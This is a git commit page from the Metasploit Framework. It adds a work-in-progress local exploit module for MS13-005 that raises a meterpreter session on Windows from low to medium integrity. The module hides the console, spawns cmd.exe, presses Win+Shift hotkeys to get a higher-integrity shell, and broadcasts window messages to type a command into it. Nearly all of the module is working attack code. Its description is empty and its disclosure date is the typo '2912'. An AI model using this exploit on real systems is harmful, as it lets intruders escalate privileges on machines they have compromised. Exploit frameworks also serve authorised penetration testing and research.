Initial working

bug/bundler_fix
Meatballs 2013-07-25 23:24:11 +01:00
parent 0e350a1211
commit 0235e6803d
2 changed files with 107 additions and 0 deletions

View File

@ -12,6 +12,8 @@ class Def_kernel32
def self.create_dll(dll_path = 'kernel32')
dll = DLL.new(dll_path, ApiConstants.manager)
dll.add_function( 'GetConsoleWindow', 'LPVOID',[])
dll.add_function( 'ActivateActCtx', 'BOOL',[
["HANDLE","hActCtx","inout"],
["PBLOB","lpCookie","out"],

View File

@ -0,0 +1,105 @@
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
def initialize(info={})
super( update_info( info,
'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation',
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
'Tavis Ormandy', #Discovery
'Axel Souchet' #@0vercl0k POC
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate'=> "Nov 27 2912"
# References CVE-2013-0008
))
end
def win_shift(number)
vk = 0x30 + number
bscan = 0x81 + number
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
client.railgun.user32.keybd_event(vk, bscan, 0, 0)
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
end
def count_cmd_procs
count = 0
client.sys.process.each_process do |proc|
if proc['name'] == 'cmd.exe'
count += 1
end
end
puts count
return count
end
# Run Method for when run command is issued
def exploit
@payload_name = datastore['PAYLOAD']
@payload_arch = framework.payloads.create(@payload_name).arch
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if hwin == nil
hwin = client.railgun.user32.GetForegroundWindow()['return']
end
puts client.railgun.user32.ShowWindow(hwin, 0)
puts client.railgun.user32.ShowWindowAsync(hwin, 5)
# Spawn low integrity cmd.exe
li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs
# Win+Shift+?
number = 0
begin # Ruby DoWhile!
i = (9 - number)
win_shift(number)
number += 1
sleep(1)
end while count_cmd_procs == count and number <= 9
print_status "Spawned!!!"
client.sys.process.kill(li_cmd_pid)
payload = "calc.exe"
hwnd_broadcast = 0xffff
wm_char = 0x0102
payload.each_char do |c|
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0)
end
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0)
end
end